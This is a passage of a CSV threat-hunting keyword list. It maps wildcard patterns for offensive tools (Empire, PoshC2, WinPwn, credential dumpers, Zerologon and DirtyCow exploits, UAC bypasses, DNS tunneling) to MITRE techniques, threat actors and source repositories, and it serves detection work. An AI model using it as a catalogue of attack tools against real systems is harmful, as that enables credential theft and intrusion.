Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UsersHomeFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-VaultCredCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-VaultCredCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-VaultListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Vnc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Vnc.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-VNCServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-VNCViewer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-VoiceTroll.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Vulmap*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-VulnerableADCSTemplates*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-watson*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-WCMDump*","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","1","N/A","N/A","8","708","132","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z" +"*Invoke-WCMDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-WebRequest https://tinyurl.com/*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*Invoke-WebRequest ifconfig.me/ip*Content.Trim()","greyware_tool_keyword","powershell","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*Invoke-WebRev.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Whisker*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-WindowsUpdateCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-WinEnum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WinEnum.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WinEnum.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WinlogonCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-WinlogonCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-winPEAS*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-winPEAS*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-winrmsession*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-WireTap*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-WlanProfilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-WmiCommand *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-WmiCommand*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*invoke-wmiexec *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-WMIExec*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-WMIExec*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*invoke-wmijspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-wmipayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-WmiShadowCopy*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*Invoke-WScriptBypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-WscriptElevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ZeroLogon*","offensive_tool_keyword","Invoke-ZeroLogon","Zerologon CVE exploitation","T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004","TA0001 - TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-ZeroLogon","1","1","N/A","N/A","3","203","46","2020-10-14T04:42:58Z","2020-09-17T05:01:46Z" +"*Invoke-Zerologon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoking CreateSvcRpc (by @x86matthew*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*io_dirtycow.c*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" +"*io_dirtycow.so*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" +"*iocnglnmfkgfedpcemdflhkchokkfeii*","greyware_tool_keyword","sVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*iodine -*","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data Exfiltration","https://linux.die.net/man/8/iodine","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*iodined -*","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0002","N/A","N/A","Data 